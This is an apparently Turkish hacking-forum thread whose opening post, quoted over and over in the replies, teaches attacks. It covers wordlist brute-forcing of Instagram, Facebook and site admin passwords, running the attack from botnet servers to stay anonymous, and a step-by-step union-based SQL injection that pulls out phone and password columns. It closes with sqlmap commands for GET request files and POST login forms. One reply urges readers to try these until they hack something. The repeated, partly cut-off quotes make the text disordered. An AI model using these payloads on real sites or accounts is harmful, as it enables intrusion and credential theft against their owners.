Sık Kullanılan Hack Yöntemleri

Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

https://spyhackerz.org/forum/threads/İnsta-hack-İçin-tüm-Şifre-wordlistlerini-hazırlama-6-basamaklı.26879/

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

Throwbin

Throwbin is a website where you can store text online for a set period of time.

throwbin.io

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Hidden content]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Hidden content]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+1

yanlışlıkla paylaştım tamamlıyorum kusura bakmayın

 

konu Delete lütfen yazdıklarım birden kapandı tamamlayamadım kusura bakmayın bir hata oldu yarın en kısa zamanda tekrar yazıcam

 

e

 

ellerine sağlık

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Hidden content]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Hidden content]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+1

eyw

 

e

ellerine sağlık

eyw

hepinize teşekkür ederim konuyu yakın zamanda tekrar yazıcam kusura bakmayın eksik oldu bir hata çıktı devamını yazamadım

 

rye

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Hidden content]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Hidden content]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+1

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+1

acdzvz

 

EYW

 

EYW

önemli değil

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+1

sa

 

sa

as

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+1

sa

 

sa

kardeşim boş yorum atmak yasak bişey sorcaksan söyle yardımcı olalım

 

eline sağlık

 

Bakalim

 

Eline saglik

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

Cvp

 

eline sağlık

Eline saglik

eyw

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

Eline Koluna Sağlık Güzel Çalışma

----------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Eline Koluna Sağlık Güzel Çalışma

----------------------------------------------------------------------------------------------------------------------------------------------------------------

eyw kardeşimde bunları okurken dene illaki bir tane hackliceksin

 

eyw kardeşimde bunları okurken dene illaki bir tane hackliceksin

Tmm Canım Kardeşim

 

bakalım

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

